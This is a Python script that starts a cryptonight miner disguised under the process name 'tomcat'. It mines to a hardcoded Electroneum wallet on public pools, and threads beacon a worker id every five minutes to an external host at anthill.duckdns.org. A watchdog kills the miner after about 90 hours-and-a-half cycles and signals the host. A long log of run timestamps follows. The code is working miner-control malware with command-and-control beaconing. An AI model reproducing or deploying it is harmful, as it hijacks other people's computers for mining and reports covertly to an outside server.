import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:08:05.584857
#2018-02-17 16:54:05.615839
#2018-02-17 18:42:06.030027
#2018-02-17 20:32:01.754868
#2018-02-17 22:18:07.742754
#2018-02-18 00:02:06.284534
#2018-02-18 01:53:01.725192
#2018-02-18 03:41:02.158758
#2018-02-18 05:28:06.288841
#2018-02-18 07:20:04.600135
#2018-02-18 09:08:05.961796
#2018-02-18 10:54:06.888215
#2018-02-18 12:42:02.223239
#2018-02-18 14:28:06.968608
#2018-02-18 16:18:07.559004
#2018-02-18 18:08:01.626738
#2018-02-18 19:54:03.442116
#2018-02-18 21:40:05.822206
#2018-02-18 23:28:05.200877
#2018-02-19 01:15:07.780944
#2018-02-19 03:01:06.595696
#2018-02-19 04:49:02.097088
#2018-02-19 06:33:04.096308
#2018-02-19 08:22:02.235416
#2018-02-19 10:12:01.573743
#2018-02-19 12:00:05.518847
#2018-02-19 13:48:01.832349
#2018-02-19 15:38:07.628621
#2018-02-19 17:25:01.743523
#2018-02-19 19:13:04.652560
#2018-02-19 21:02:06.500640
#2018-02-19 22:50:10.056895
#2018-02-20 00:33:06.784218
#2018-02-20 02:23:05.474622
#2018-02-20 04:14:04.389841
#2018-02-20 05:57:03.450669
#2018-02-20 07:43:01.454675
#2018-02-20 09:28:04.655963
#2018-02-20 11:12:05.124895
#2018-02-20 12:59:04.565286
#2018-02-20 14:44:07.828704
#2018-02-20 16:28:06.444810
#2018-02-20 18:17:04.246290
#2018-02-20 20:08:06.003135
#2018-02-20 21:55:08.731135
#2018-02-20 23:37:07.167789
#2018-02-21 01:23:05.316552
#2018-02-21 03:13:04.428138
#2018-02-21 05:01:01.667922
#2018-02-21 06:49:05.964528
#2018-02-21 08:34:06.843078
#2018-02-21 10:19:03.913091
#2018-02-21 12:06:04.672152
#2018-02-21 13:54:01.648906
#2018-02-21 15:39:01.822748
#2018-02-21 17:29:08.541852
#2018-02-21 19:16:06.319363
#2018-02-21 21:05:06.636546
#2018-02-21 22:52:03.652437
#2018-02-22 00:37:04.606448
#2018-02-22 02:24:08.391574
#2018-02-22 04:11:08.002128
#2018-02-22 05:56:06.853772
#2018-02-22 07:42:04.024454
#2018-02-22 09:31:02.037037
#2018-02-22 11:16:05.273452
#2018-02-22 13:01:04.161718
#2018-02-22 14:48:07.008036
#2018-02-22 16:34:05.210080
#2018-02-22 18:21:04.982722
#2018-02-22 20:13:06.958050
#2018-02-22 21:59:08.190239
#2018-02-22 23:47:01.348503
#2018-02-23 01:35:07.427407
#2018-02-23 03:23:06.352715
#2018-02-23 05:10:01.644957
#2018-02-23 06:55:06.634292
#2018-02-23 08:46:04.158560
#2018-02-23 11:04:01.663372
#2018-02-23 12:59:01.355542
#2018-02-23 14:45:10.928868
#2018-02-23 16:34:07.001429
#2018-02-23 18:20:08.490363
#2018-02-23 20:04:04.224816
#2018-02-23 21:48:05.521565
#2018-02-23 23:42:02.226192
#2018-02-24 01:32:06.483917
#2018-02-24 03:21:07.877093
#2018-02-24 05:08:04.748248
#2018-02-24 06:58:01.266354
#2018-02-24 08:48:06.940430
#2018-02-24 10:48:04.475420
#2018-02-24 12:35:04.090895
#2018-02-24 14:24:04.063506
#2018-02-24 16:12:03.988926
#2018-02-24 18:04:01.248606
#2018-02-24 19:51:07.335639
#2018-02-24 21:36:05.682149
#2018-02-25 00:25:04.151173
#2018-02-25 04:25:06.244216
#2018-02-25 08:06:07.011226